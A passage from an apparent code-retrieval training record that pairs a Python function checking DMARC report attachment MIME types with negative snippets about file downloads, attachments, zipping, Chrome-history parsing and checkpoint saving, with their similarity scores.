response['Content-Disposition'] = 'attachment; filename=' + zip_filename\n response['Content-length'] = in_memory_zip.tell()\n\n # Return the HTTP response\n return response",
"def _add_tag_files(\n zip_file, dir_name, payload_info_list, payload_byte_count, payload_file_count\n):\n tag_info_list = []\n _add_tag_file(zip_file, dir_name, tag_info_list, _gen_bagit_text_file_tup())\n _add_tag_file(\n zip_file,\n dir_name,\n tag_info_list,\n _gen_bag_info_file_tup(payload_byte_count, payload_file_count),\n )\n _add_tag_file(\n zip_file, dir_name, tag_info_list, _gen_pid_mapping_file_tup(payload_info_list)\n )\n return tag_info_list",
"def process_files(exp_folders):\n pool = mp.Pool()\n results = pool.imap_unordered(read_and_serialize, exp_folders)\n\n stat = []\n for res in results:\n print(res)\n stat.append(res)\n\n pool.close()\n pool.join()",
"def get_files(self):\n # self.folder= +str(int(time.time()))\n if not os.path.exists(self.folder):\n os.mkdir(self.folder)\n while len(self.url_queue): # If we have URLs to crawl - we crawl\n href = self.url_queue.popleft() # We grab a URL from the left of the list\n filename = href.rsplit('/', 1)[-1]\n print(\"Downloading %s to %s...\" % (href, filename))\n fullname = os.path.join(self.folder, filename)\n urlretrieve(href, fullname)\n self.xlfnames.append(filename)",
"def collect_attachments(self, paths_or_urls: Iterable[str]) -> List[Tuple[str, str, str, bytes]]:\n attachments = []\n same_content = [] # type: List[bytes]\n for src in paths_or_urls:\n try:\n content = self.load_file(src)\n except ImageNotFound as err:\n self.log_error(err)\n self.conditionally_raise(err)\n continue\n content_hash = hashlib.md5(content).digest()\n if content_hash in same_content:\n continue\n same_content.append(content_hash)\n maintype, subtype = self._get_mime_type(src)\n filename = os.path.basename(src)\n attachments.append((maintype, subtype, filename, content))\n return attachments",
"def _download_file(self, video_objects):\n downloaded_video = []\n path=\"media/\"\n for video_object in video_objects:\n if 'contentUrl' in video_object.keys() and video_object['contentUrl']!='':\n \n url = video_object['contentUrl']\n filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n \n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n path+=filename\n return path",
"def getFiles(directory):\n # os.listdir only for locally downloaded files\n _files=[]\n for item in os.listdir(directory):\n path = os.path.join(directory, item)\n if not os.path.isdir(path) and \".lhe.gz\" in path:\n _files.append(path)\n elif os.path.isdir(path):\n getFiles(path)\n return _files",
"def parse_attachments(request):\n attachments = []\n for attachment in request.files.getlist('attachment'):\n attachments.append(Attachment(attachment.filename, attachment))\n return attachments",
"def extract(request):\n try:\n files = request.FILES.getlist('myFile')\n msg_data = []\n fs = FileSystemStorage()\n for file in files:\n name = file.name.replace(\" \", \"_\")\n if os.path.exists(settings.MEDIA_ROOT + \"\\\\\" + name):\n os.remove(settings.MEDIA_ROOT + \"\\\\\" + name)\n fs.save(settings.MEDIA_ROOT + \"\\\\\" + name, file)\n msg = extract_msg.Message(settings.MEDIA_ROOT + \"\\\\\" + name)\n msg.save_attachments(customPath=settings.MEDIA_ROOT + \"\\\\\")\n attachments = []\n for i in range(0, len(msg.attachments)):\n attachments.append({\n \"filename\": msg.attachments[i].shortFilename,\n \"filepath\": \"/media/\" + msg.attachments[i].shortFilename\n })\n msg_data.append({\n # \"mainProperties\": msg.mainProperties,\n # \"header\": msg.header,\n \"attachments\": attachments,\n \"filename\": file.name,\n \"filepath\": \"/media/\" + name,\n \"from\": msg.sender,\n \"to\": msg.to,\n \"cc\": msg.cc,\n \"subject\": msg.subject,\n \"date\": msg.date,\n \"body\": msg.body,\n })\n msg.close()\n response = {\n \"response\": \"SUCCESS\",\n \"message\": \"File Uploaded!\",\n \"data\": msg_data\n }\n except:\n response = {\n \"response\": \"FAIL\",\n \"message\": \"Erorr in file uploading!\",\n \"data\": msg_data\n }\n return Response(response)",
"def output_files(self):\n o = []\n if 'unweighted' in self.event_types:\n o.append(self.name + \"_unweighted_events.lhe.gz\")\n if 'weighted' in self.event_types:\n o.append(self.name + \"_events.lhe.gz\")\n return o",
"def extract_files(self, *filenames):\n for filename in filenames:\n data = self.read_file(filename)\n f = open(filename, 'wb')\n f.write(data or b'')\n f.close()",
"def _add_payload_files(zip_file, payload_info_list):\n payload_byte_count = 0\n payload_file_count = 0\n for payload_info_dict in payload_info_list:\n zip_file.write_iter(payload_info_dict[\"path\"], payload_info_dict[\"iter\"])\n payload_byte_count += payload_info_dict[\"iter\"].size\n payload_file_count += 1\n return payload_byte_count, payload_file_count",
"def save_attachments_in_doc(self, doc):\n\t\tsaved_attachments = []\n\n\t\tfor attachment in self.attachments:\n\t\t\ttry:\n\t\t\t\tfile_data = save_file(attachment['fname'], attachment['fcontent'],\n\t\t\t\t\tdoc.doctype, doc.name, is_private=1)\n\t\t\t\tsaved_attachments.append(file_data)\n\n\t\t\t\tif attachment['fname'] in self.cid_map:\n\t\t\t\t\tself.cid_map[file_data.name] = self.cid_map[attachment['fname']]\n\n\t\t\texcept MaxFileSizeReachedError:\n\t\t\t\t# WARNING: bypass max file size exception\n\t\t\t\tpass\n\t\t\texcept frappe.DuplicateEntryError:\n\t\t\t\t# same file attached twice??\n\t\t\t\tpass\n\n\t\treturn saved_attachments",
"def ParseFiles(self, responses):\n # Note that some of these Find requests will fail because some paths don't\n # exist, e.g. Chromium on most machines, so we don't check for success.\n if responses:\n for response in responses:\n client_path = db.ClientPath.FromPathSpec(self.client_id,\n response.stat_entry.pathspec)\n filepath = response.stat_entry.pathspec.CollapsePath()\n fd = file_store.OpenFile(client_path)\n hist = chrome_history.ChromeParser()\n count = 0\n for epoch64, dtype, url, dat1, dat2, dat3 in hist.Parse(filepath, fd):\n count += 1\n str_entry = \"%s %s %s %s %s %s\" % (datetime.datetime.utcfromtimestamp(\n epoch64 / 1e6), url, dat1, dat2, dat3, dtype)\n self.SendReply(rdfvalue.RDFString(str_entry))\n\n self.Log(\"Wrote %d Chrome History entries for user %s from %s\", count,\n self.args.username, response.stat_entry.pathspec.Basename())\n self.state.hist_count += count"
] |
[
"0.5935676",
"0.5921422",
"0.590038",
"0.5832488",
"0.58300406",
"0.5676737",
"0.561249",
"0.55952454",
"0.55590147",
"0.5538954",
"0.55148673",
"0.5504614",
"0.5495929",
"0.54576784",
"0.54488444",
"0.5446717",
"0.5422017",
"0.5404831",
"0.54028255",
"0.5400352",
"0.5391549",
"0.53905374",
"0.53765124",
"0.53757644",
"0.53697354",
"0.5363725",
"0.53434485",
"0.5337164",
"0.5327103",
"0.5322667"
] |
0.62589914
|
0
|
Check if a given mimetype is eligible for further processing Returns true of false
|
def check_eligible_mimetype(self, ctype, uid):
self.helper.log_debug(
'check_eligible_mimtype: checking content-type %s of msg uid %s' %
(ctype, uid))
if ctype == "application/zip":
return True
elif ctype == "application/gzip":
return True
elif ctype == "application/x-gzip":
return True
elif ctype == "application/octet-stream":
# Non-standard mimetype used by Amazon SES dmarc reports
return True
elif ctype == "application-x-gzip":
# Non-standard mimetype used by Comcast dmarc reports
return True
elif ctype == "application/x-zip-compressed":
# Non-standard mimetype used by Yahoo dmarc reports
return True
elif ctype == "application/xml":
return True
elif ctype == "text/xml":
return True
else:
self.helper.log_debug(
'check_eligible_mimtype: skipping content-type %s of msg uid %s' %
(ctype, uid))
return False
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _check_mimetype(self):\n if self.mimetype in Config.aliases:\n mimetype = Config.aliases[self.mimetype]\n else:\n mimetype = self.mimetype\n expected_extensions = mimetypes.guess_all_extensions(mimetype,\n strict=False)\n if expected_extensions:\n if self.has_extension and self.extension not in expected_extensions:\n # LOG: improve this string\n self.make_dangerous('expected extensions')",
"def is_accept_type(file_name):\n bare_name, file_extension = os.path.splitext(file_name)\n for ext in ACCEPTED_FILES:\n if file_extension.lower() == ext:\n return True\n return False",
"def is_binary_file_mime_type(mime_type, cfg):\n if mime_type:\n # We require explicit handling of the web-friendly images.\n # For all other types, pattern-matching is used.\n if is_viewable_image(mime_type):\n return mime_type in cfg.options.binary_mime_types\n for pattern in cfg.options.binary_mime_types:\n if fnmatch.fnmatch(mime_type, pattern):\n return True\n return False",
"def check_file_type(fname):\n ext = path.splitext(fname)[1]\n return ext in allowed_extensions",
"def allowed_file_type(file_name):\n\treturn file_name.lower().endswith(ALLOWED_FILE_TYPES)",
"def is_file_type(file_path, file_type):\n\n if not file_exists(file_path):\n return False\n\n if file_path.endswith(file_type):\n return True\n\n return False",
"def _check_extension(self):\n if self.extension in Config.override_ext:\n expected_mimetype = Config.override_ext[self.extension]\n else:\n expected_mimetype, encoding = mimetypes.guess_type(self.src_path,\n strict=False)\n if expected_mimetype in Config.aliases:\n expected_mimetype = Config.aliases[expected_mimetype]\n is_known_extension = self.extension in mimetypes.types_map.keys()\n if is_known_extension and expected_mimetype != self.mimetype:\n # LOG: improve this string\n self.make_dangerous('expected_mimetype')",
"def _check_url_file_type(headers: Dict[str, str]) -> Optional[str]:\n content_type = headers.get(\"content-type\", \"\").lower()\n file_type = None\n\n for extension in SUPPORTED_MIME_TYPES.keys():\n for mime_type in SUPPORTED_MIME_TYPES.get(extension, []):\n if mime_type in content_type:\n file_type = extension\n break\n\n return file_type",
"def supportedType(request, video_types):\n return request.FILES['file'].content_type in video_types.keys()",
"def validate_image_type(filename: str) -> bool:\n supported_extensions = (\"png\", \"jpg\", \"jpeg\")\n return (filename not in (None, \"\")) and (get_extension(filename) in supported_extensions)",
"def secure_filetype(file):\n ext_list = ['png', 'jpg', 'jpeg']\n ext_valid = file.filename.split('.')[-1] in ext_list\n\n mimetype_list = [\"image/jpeg\", \"image/jpg\", \"image/png\"]\n mimetype_valid = file.mimetype in mimetype_list\n\n return ext_valid and mimetype_valid",
"def canProcess(self, event, meta):\n if len(self.subscribe) and event not in self.subscribe:\n return False\n\n if len(self.mime) and meta.has_key('getcontenttype'):\n nodeMime = meta['getcontenttype']\n for mime in self.mime:\n if nodeMime.startswith(mime):\n return True\n return False\n\n return True",
"def _IsIgnoredFileType(filename):\n for extension in _IGNORE_FILETYPES_FOR_MINIDUMP_PULLS:\n if filename.endswith(extension):\n return True\n return False",
"def _IsIgnoredFileType(filename):\n for extension in _IGNORE_FILETYPES_FOR_MINIDUMP_PULLS:\n if filename.endswith(extension):\n return True\n return False",
"def is_file_type_error(self):\n return self._tag == 'file_type_error'",
"def _accept_for_flag (self, filename):\n\t\troot, ext = os.path.splitext(filename)\n\t\tif not ext:\n\t\t\treturn 1\n\t\telse:\n\t\t\tbinary_extensions = ['.jpg', '.gif', '.png', '.jar' ]\n\t\t\treturn ext not in ['.bak', '.off','.old', '.works', '.clean', '.obs', '.log', '.db'] + binary_extensions",
"def validFiles(self, files):\n for myfile in files:\n if not ( ( myfile.get_uri_scheme() == 'file' ) or \\\n ( myfile.get_uri_scheme() == 'smb' ) ):\n return False\n elif ( not myfile.get_mime_type() in self.oootypes ) and \\\n ( not myfile.get_mime_type() in self.plaintypes ):\n return False\n return True",
"def images_media_filter(hash_str, mime_type):\n return mime_type in MIME_TO_EXTESION_MAPPING",
"def valid_media_type(media_type):\n return media_type in ACCEPTED_MEDIA_TYPES",
"def is_filetype(img_path, formats=[\"jpg\", \"png\", \"gif\", \"pgm\", \"tif\", \"ppm\"]):\n # formats = [\"jpg\", \"png\", \"gif\", \"pgm\"]\n end = img_path[-3:]\n return os.path.isfile(img_path) and (end in formats)",
"def is_image(content_type):\n return content_type == \"image/jpeg\" or content_type == \"image/png\"",
"def file_allowed(self):\n if self._allowed_ext:\n if self.get_ext() not in self._allowed_ext:\n return False\n \n return True",
"def is_file(self):\n return self.type == \"file\"",
"def check_media_file_type(media_file_class):\n if media_file_class == 'AudioFile':\n media_file_type = 'Audio file'\n elif media_file_class == 'VideoFile':\n media_file_type = 'Video file'\n elif media_file_class == 'DocumentFile':\n media_file_type = 'Document file'\n elif media_file_class == 'ImageFile':\n media_file_type = 'Image file'\n\n return media_file_type",
"def check_type(filename):\n try:\n im = Image.read(filename)\n except SanperaError:\n return False\n else:\n return im.original_format in [b'JPEG', b'PNG', b'GIF']",
"def check_file(file: UploadFile) -> bool:\n # accept all image, video and audio types\n mimetype = mimetypes.guess_type(file.filename)[0]\n if mimetype is not None and mimetype.split(\"/\")[0] in {\"image\", \"audio\", \"video\"}:\n return True\n # if not, only accept whitelisted file extensions\n ext = os.path.splitext(file.filename)[1]\n if ext not in settings.FILE_EXTENSION_WHITELIST:\n raise FileValidationError(f\"{file.filename} is an invalid file type\")\n return True",
"def is_filetype(filename=None, search_str=None):\n if not search_str:\n return False\n results = puremagic.magic_file(filename)\n for result in results:\n if search_str.lower() in result.name.lower():\n return True\n return False",
"def is_processable_file(file_name):\n return str(file_name).endswith(PROCESSABLE_FILES)",
"def _file_can_be_compressed(filename):\n content_type = ''\n with open(filename, 'rb') as f:\n content_type = _get_content_type(f)\n return content_type in TEXT_TYPES",
"def is_image(self):\r\n # we can only get this if we have headers\r\n LOG.debug('content type')\r\n LOG.debug(self.content_type)\r\n if (self.content_type is not None and\r\n self.content_type.lower() in IMAGE_TYPES.values()):\r\n return True\r\n else:\r\n return False"
] |
[
"0.73119986",
"0.6826056",
"0.6730636",
"0.67149067",
"0.6682556",
"0.6661485",
"0.66420454",
"0.6575386",
"0.6550504",
"0.6504457",
"0.65020347",
"0.65004003",
"0.6454048",
"0.6454048",
"0.6450731",
"0.6439068",
"0.642226",
"0.6412332",
"0.64115924",
"0.63734996",
"0.63124907",
"0.6291791",
"0.6290675",
"0.6289728",
"0.6279121",
"0.62504053",
"0.6194957",
"0.6188165",
"0.6187862",
"0.61877674"
] |
0.7656266
|
0
|
Save checkpointing info for a given uid and msg struct
|
def save_check_point(self, uid, msg):
key = "%s_%s_%s" % (self.opt_pop3_server,
self.opt_global_account["username"], uid)
date = email.utils.mktime_tz(email.utils.parsedate_tz(msg.get('Date')))
value = "input=dmarc_pop, server=%s, username=%s, uid=%s, timestamp_utc=%d, subject='%s'" % (
self.opt_pop3_server, self.opt_global_account["username"], uid, date, msg.get('Subject'))
try:
self.helper.save_check_point(key, value)
except Exception as e:
raise Exception(
"Error saving checkpoint data with with exception %s" %
str(e))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def save_to_checkpoint(self, chkpt):\n chkpt[self.name] = self.state_dict()",
"def checkpoint():",
"def save_checkpoint(self, value):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n self.state.post(json.dumps({\"from\": value}))\n self.applogger.info(\n '{}(method={}) : {} : successfully saved checkpoint. from=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, value\n )\n )\n except Exception as ex:\n self.applogger.exception(\n '{}(method={}) : {} : Unexpected error while saving checkpoint: err=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, str(ex)\n )\n )\n raise Exception(ex)",
"def save_checkpoint(self, checkpoint: str) -> str:\n\n # Some model might need to aggregate variables during checkpointing\n # which requires both the chief and workers to participate in the\n # allreduce communication protocol.\n # So we need to call get_state on every remote workers, otherwise\n # it might get stuck\n state_refs = [w.get_state.remote() for w in self.remote_workers]\n\n state = ray.get(state_refs[0])\n\n with open(checkpoint, \"wb\") as f:\n SafePickle.dump(state, f)\n\n return checkpoint",
"def checkpoint(self):\n save()",
"def save_checkpoint_snapshot(self, value):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n self.state.post(json.dumps({\"snapshot\": value}))\n self.applogger.info(\n \"{}(method={}) : {} : successfully saved checkpoint.\".format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name\n )\n )\n except Exception as ex:\n self.applogger.exception(\n '{}(method={}) : {} : Unexpected error while saving checkpoint: err=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, str(ex)\n )\n )\n raise Exception(ex)",
"def saveCheckpoint(self):\n time_stamp = time.strftime('%Y%m%d%H%M%S', time.gmtime())\n state_filename = os.path.join(self.saving_dir, 'checkpoint.' + time_stamp + '.pth.tar')\n mem_filename = os.path.join(self.saving_dir, 'memory.' + time_stamp + '.pth.tar')\n state = self.getSavingState()\n memory = {\n 'memory': self.memory\n }\n torch.save(state, state_filename)\n torch.save(memory, mem_filename)",
"def save(self, checkpoint_path: str):\r\n raise NotImplementedError",
"def save_checkpoint(self):\n checkpoin_path = self.get_checkpoint_path()\n _logger.info('Save checkpoint ignored by tuner, checkpoint path: %s', checkpoin_path)",
"def save_checkpoint(self, folder='checkpoint', filename='checkpoint.pth.tar'):\n data = dict()\n data[\"inst\"] = \"save\"\n data[\"folder\"] = folder\n data[\"filename\"] = filename\n\n q_idx, data_id = self.put(data, q_idx=0) # Send instruction to first nnet\n self.get(q_idx, data_id) # Blocks here\n\n # Done",
"def save_checkpoint(self, checkpoint_info):\n torch.save(checkpoint_info, os.path.join(self.checkpoint_path, self.checkpoint_file))",
"def save_ckpt(self, name=None):\r\n if name is None:\r\n save_path = os.path.join(self.model_dir, \"ckpt_epoch{}.pth\".format(self.clock.epoch))\r\n print(\"Checkpoint saved at {}\".format(save_path))\r\n else:\r\n save_path = os.path.join(self.model_dir, \"{}.pth\".format(name))\r\n if isinstance(self.net, nn.DataParallel):\r\n torch.save({\r\n 'clock': self.clock.make_checkpoint(),\r\n 'model_state_dict': self.net.module.cpu().state_dict(),\r\n 'optimizer_state_dict': self.optimizer.state_dict(),\r\n 'scheduler_state_dict': self.scheduler.state_dict(),\r\n }, save_path)\r\n else:\r\n torch.save({\r\n 'clock': self.clock.make_checkpoint(),\r\n 'model_state_dict': self.net.cpu().state_dict(),\r\n 'optimizer_state_dict': self.optimizer.state_dict(),\r\n 'scheduler_state_dict': self.scheduler.state_dict(),\r\n }, save_path)\r\n self.net.cuda()",
"def checkpoint_save(self, epoch, model, label=None, checkpoint=None, path=\"\"):\n\n if label is None:\n label = f\"checkpoint-{epoch}\"\n else:\n label = f\"{label}-checkpoint-{epoch}\"\n\n if checkpoint is None:\n pass\n elif checkpoint == -1:\n Potentials.save(model=model, label=label, path=path)\n elif epoch % checkpoint == 0:\n Potentials.save(model=model, label=label, path=path)",
"def create_checkpoint(self):\n checkpoint_id = uuid.uuid4()\n self.checkpoints.append(checkpoint_id)\n self.journal_data[checkpoint_id] = {}\n return checkpoint_id",
"def save_checkpoint(self, label):\n model_dir = os.path.join(\n config.results_dir, config.experiment_name, 'checkpoints')\n os.makedirs(model_dir, exist_ok=True)\n model_file = os.path.join(model_dir, '{}_net.pth.tar'.format(label))\n\n model_dict = {'net_state_dict': self.net.state_dict(),\n 'use_cuda': self.use_cuda}\n\n print(\"Saving model to {}\".format(model_file))\n torch.save(model_dict, model_file)",
"def save_msg(self, msg: TrafficSigns):\n if msg.sub_messages:\n tf = self.get_transformation(\n \"sim_world\",\n msg.header.frame_id,\n msg.sub_messages[0].header.stamp,\n timeout=rospy.Duration(0.1),\n )\n if tf is not None:\n rospy.logdebug(f\"point before transformation {msg.sub_messages}\")\n points = [\n (tf * Point(m.pose.position), self.name_conversion[m.type])\n for m in msg.sub_messages\n ]\n for point, class_desc in points:\n self.add_detection(point, class_desc)\n self.publish_counter += 1\n self._publish_point_marker(point, self.publish_counter)\n else:\n rospy.logerr(\n f\"Error: could not get a transformation, message: {msg.sub_messages}\"\n )",
"def storeReceipt(self, uid, msg, receipt):\n # check is message is read on user message box\n path = os.path.join(self.userMessageBox(self.getUuidFromUid(uid)), msg)\n log(logging.DEBUG, \"Verifying read status of message \" + msg + \" on \" + path)\n if not os.path.exists(path):\n log(logging.ERROR, \"Message doesn't exist on user message box\")\n return\n # try to find message patterns\n matches = re.match(\"_?([a-f]|[0-9]){8}-([a-f]|[0-9]){4}-([a-f]|[0-9]){4}-([a-f]|[0-9]){4}-([a-f]|[0-9]){12}_[0-9]+\", msg)\n if not matches:\n log(logging.ERROR, \"Internal error, wrong message file name format!\")\n return\n # spilt by \"_\"\n msg_id_parts = str.split(str(msg), \"_\")\n log(logging.DEBUG, \"Message to be stored parts: \" + str(msg_id_parts))\n # path for new file\n if len(msg_id_parts) == 2:\n log(logging.ERROR, \"Message not read\")\n return\n # path = os.path.join(self.userReceiptBox(msg_id_parts[0]), \"_%s_%s_%d\" % (self.getUuidFromUid(uid), msg_id_parts[1], time.time() * 1000))\n else:\n path = os.path.join(self.userReceiptBox(msg_id_parts[1]), \"_%s_%s_%d\" % (self.getUuidFromUid(uid), msg_id_parts[2], time.time() * 1000))\n # save new file\n try:\n log(logging.INFO, \"Saving receipt at \" + path)\n self.saveOnFile(path, json.dumps(receipt))\n except:\n logging.exception(\"Cannot create receipt file\")",
"def save_checkpoint(state, filename):\n torch.save(state, filename) # save checkpoint",
"def save_checkpoint(self, name):\n timestamp = datetime.datetime.now(self.time_zone).strftime(\"%Y-%m-%d_%H:%M:%S\")\n backup_dir = os.path.join(os.path.dirname(self.path), \"backups\")\n checkpoint_path = os.path.join(backup_dir, \"%s_%s.pickle\" % (timestamp, name))\n pickle.dump(self, open(checkpoint_path, \"wb\"))",
"def _save_state(self, saver, session, data, checkpts_path):\n # Save variable state\n if checkpts_path:\n logging.info('Saving cotrain checkpoint at %s.', checkpts_path)\n saver.save(session, checkpts_path, write_meta_graph=False)\n\n # Save dataset state.\n if self.data_dir:\n logging.info('Saving self-labeled dataset backup.')\n data.save_state_to_file(self.data_dir)",
"def saveCheckpoint(acc, epoch, model, train_hist):\r\n print('Saving..')\r\n state = {\r\n 'model': model,\r\n 'acc': acc,\r\n 'epoch': epoch,\r\n 'rng_state': torch.get_rng_state(),\r\n 'train_hist': train_hist\r\n }\r\n if not os.path.isdir('checkpoint'): # save to checkpoint directory\r\n os.mkdir('checkpoint')\r\n torch.save(state, './checkpoint/ckpt' + '_' + str(epoch+1))",
"def save_checkpoint(self, name):\n path = os.path.join(self.params.dump_path, '%s.pth' % name)\n logger.info(\"Saving %s to %s ...\" % (name, path))\n\n data = {\n 'epoch': self.epoch,\n 'best_metrics': self.scores\n }\n\n logger.warning(\"Saving model parameters ...\")\n data['model'] = self.encoder.model.state_dict()\n data['classifier'] = self.proj\n data['dico_id2word'] = self.data['dico'].id2word\n data['dico_word2id'] = self.data['dico'].word2id\n data['dico_counts'] = self.data['dico'].counts\n # print(self.encoder.pretrain_params)\n data['params'] = self.encoder.pretrain_params.update({k: v for k, v in self.params.__dict__.items()})\n\n torch.save(data, path)",
"def save_checkpoint(checkpoint_dir, epoch, iteration, save_dict):\n os.makedirs(checkpoint_dir, exist_ok=True)\n path = opj(checkpoint_dir, str(epoch) + '.' + str(iteration) + '.ckpt')\n assert epoch == save_dict['epoch'], \"`epoch` != save_dict's `start_epoch`\"\n assert iteration == save_dict['iteration'], \"`iteration` != save_dict's `start_iteration`\"\n if os.path.isfile(path):\n print(\"Overwrite checkpoint in epoch %d, iteration %d :exclamation:\" % (epoch, iteration))\n try:\n torch.save(save_dict, path)\n except Exception:\n raise Exception(\"Fail to save checkpoint\")\n \n print(\"Checkpoint %s saved :heavy_check_mark:\" % (str(epoch) + '.' + str(iteration) + '.ckpt'))",
"async def checkpoint(cls) -> None:",
"def save_checkpoint(self, filename, extra_state):\n self.call_async(0, '_async_save_checkpoint', filename=filename, extra_state=extra_state).gen()",
"def checkpoint(self):\n self.logger.info('Checkpointing Sampler')\n with open(self.resume_file, \"wb\") as f:\n pickle.dump(self, f)",
"def save_checkpoint(\n self, file_name: str, extra_state: Optional[Dict] = None\n ) -> None:\n checkpoint = {\n \"state_dict\": self.agent.state_dict(),\n \"config\": self.config,\n }\n if extra_state is not None:\n checkpoint[\"extra_state\"] = extra_state\n\n torch.save(checkpoint, os.path.join(self.config.CHECKPOINT_FOLDER, file_name))",
"def save_ckpt(objects, epoch, score, ckpt_file):\n state_dicts = {name: obj.state_dict() for name, obj in objects.items() if obj is not None}\n ckpt = dict(state_dicts=state_dicts,\n epoch=epoch,\n score=score)\n may_make_dir(osp.dirname(ckpt_file))\n torch.save(ckpt, ckpt_file)\n msg = '=> Checkpoint Saved to {}'.format(ckpt_file)\n print(msg)",
"def save_checkpoint(self, name=''):\n self.checkpoint_path.mkdir(exist_ok=True)\n if name:\n path = self.checkpoint_path / f'{name}_{self.epoch}.tar'\n else:\n path = self.checkpoint_path / f'{self.epoch}.tar'\n torch.save(self.get_state(), path)",
"def save_checkpoint(self, filename, extra_state):\n if distributed_utils.is_master(self.args): # only save one checkpoint\n utils.save_state(\n filename, self.args, self.get_model(), self.criterion, self.optimizer,\n self.lr_scheduler, self._num_updates, self._optim_history, extra_state,\n )"
] |
[
"0.631536",
"0.6279925",
"0.6237221",
"0.6183434",
"0.6126063",
"0.597565",
"0.59595466",
"0.5867066",
"0.584878",
"0.5820152",
"0.5778265",
"0.5730842",
"0.57096046",
"0.5707325",
"0.5689171",
"0.5687834",
"0.56688297",
"0.56503177",
"0.56482583",
"0.5623402",
"0.5612697",
"0.56050825",
"0.5599473",
"0.55982995",
"0.55963665",
"0.55491596",
"0.55463403",
"0.5534326",
"0.55124736",
"0.54973197"
] |
0.76725084
|
0
|
The cols and left_cols record the index of header. Replace header based on the change between left_cols and cols.
|
def _reset_header(self):
new_header = []
for col_name in self.header:
is_left = self.left_cols.get(col_name)
if is_left:
new_header.append(col_name)
self.header = new_header
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def header_data_columns(head_line, data_cols, header):\n\n colnames = head_line.split(\",\")\n\n # Remove triling blancks and end of lines\n colnames = [x.strip() for x in colnames]\n\n # Difference between columns in the header and in the data\n diff = len(data_cols) - len(colnames)\n\n if diff > 0:\n # Add dum headers\n dums = \"\"\n for idiff in range(diff):\n dums = dums + \",dum\" + str(idiff)\n\n new_head = str(head_line.rstrip()) + dums + \" \\n\"\n header.append(new_head)\n\n elif diff < 0:\n sys.exit(\n \"STOP novonix_clean.header_data_columns \\n\"\n + \"REASON less data columns than header names \\n\"\n )\n else:\n header.append(head_line)\n\n return",
"def get_header(col_current, col_shift):\n header = col_current\n for i in range(col_shift):\n header = header.right\n return header",
"def test_empty_cols_allowed(self):\n self.test_table.allow_empty_columns = True\n self.test_table.change_header(Path=1, SectionType=3, Value=4)\n self.assertEqual(self.test_table._header, [\"Path\", None, \"SectionType\",\n \"Value\"])",
"def set_column_headers(self, headers):\n if isinstance(self.columns.idx[0], int):\n self.data = [sorted(headers)] + self.data\n\n increment = [i + 1 for i in self.rows.idx]\n self.rows.idx = [0] + increment\n\n elif isinstance(self.columns.idx[0], str):\n datum = {}\n for i, key in enumerate(self.columns.idx):\n datum.update({key: headers[i]})\n self.data = [datum] + self.data\n\n increment = [i + 1 for i in self.rows.idx]\n self.rows.idx = [0] + increment",
"def _modify_columns(self, cols, X, y=None):",
"def setup_normalyzer_header(design_matrix: DF, annot_cols: List[str], normalyzer_vals:DF) -> DF:\n\n # Get numbers set up as list of stringified numbers ('-1', '0', '0', '1', '1')\n nbr_annot_cols = len(annot_cols)\n sample_head = [-1] + [0] * (nbr_annot_cols - 1) + list(design_matrix['biorepgroup'])\n sample_head_str = [str(e) for e in sample_head]\n\n # Get text-information about each column\n label_row = list(normalyzer_vals.columns)[:nbr_annot_cols] + list(design_matrix['name'])\n\n headers = pd.DataFrame([sample_head_str, label_row])\n headers.columns = normalyzer_vals.columns\n\n return headers",
"def writeExcelHeader(worksheet, titleCols, firstTag, secondTag):\n\tcno = 0\n\tworksheet.write(0, 0, \"Old Tag\")\n\tworksheet.write(0, 1, \"New Tag\")\n\tworksheet.write(1, 0, firstTag)\n\tworksheet.write(1, 1, secondTag)\n\tfor titleCol in titleCols:\n\t\tworksheet.write(3, cno, titleCol)\n\t\tcno = cno + 1",
"def customize_headers(self,executer, tree, cursor, table,custom_headers):\n headers = executer.get_columns(table, cursor)\n tree[\"columns\"] = custom_headers\n\n\n set_width = int(self.column_length_configurator / len(headers))\n\n # Setting columns width and headers\n for column in custom_headers:\n tree.column(column, width=set_width, minwidth=self.min_width)\n tree.heading(column, text=column)",
"def writeExcelHeader(worksheet, titleCols):\n cno = 0\n for titleCol in titleCols:\n worksheet.write(0, cno, titleCol)\n cno = cno + 1",
"def headers_processor(headers):\n def apply_headers(row_set, row):\n _row = []\n pairs = izip_longest(row, headers)\n for i, (cell, header) in enumerate(pairs):\n if cell is None:\n cell = Cell(None)\n cell.column = header\n if not cell.column:\n cell.column = \"column_%d\" % i\n cell.column_autogenerated = True\n _row.append(cell)\n return _row\n return apply_headers",
"def _change_header(self, add=False):\n if self.data['history_file'] is None:\n return\n good_heading = self.data['history_header'] % self.data\n # ^^^ history_header is a string with %(abc)s replacements.\n headings = self.data['headings']\n history_lines = self.data['history_lines']\n previous = ''\n underline_char = '-'\n empty = False\n if not history_lines:\n # Remember that we were empty to start with.\n empty = True\n # prepare header line\n history_lines.append('')\n if len(history_lines) <= 1:\n # prepare underline\n history_lines.append(underline_char)\n if not headings:\n # Mock a heading\n headings = [{'line': 0}]\n inject_location = 0\n first = headings[0]\n inject_location = first['line']\n underline_line = first['line'] + 1\n try:\n underline_char = history_lines[underline_line][0]\n except IndexError:\n logger.debug(\"No character on line below header.\")\n underline_char = '-'\n previous = history_lines[inject_location]\n if add:\n inject = [\n good_heading,\n underline_char * len(good_heading),\n '',\n self.data['nothing_changed_yet'],\n '',\n '',\n ]\n if empty:\n history_lines = []\n history_lines[inject_location:inject_location] = inject\n else:\n # edit current line\n history_lines[inject_location] = good_heading\n logger.debug(\"Set heading from %r to %r.\", previous, good_heading)\n history_lines[underline_line] = utils.fix_rst_heading(\n heading=good_heading,\n below=history_lines[underline_line])\n logger.debug(\"Set line below heading to %r\",\n history_lines[underline_line])\n # Setting history_lines is not needed, except when we have replaced the\n # original instead of changing it. So just set it.\n self.data['history_lines'] = 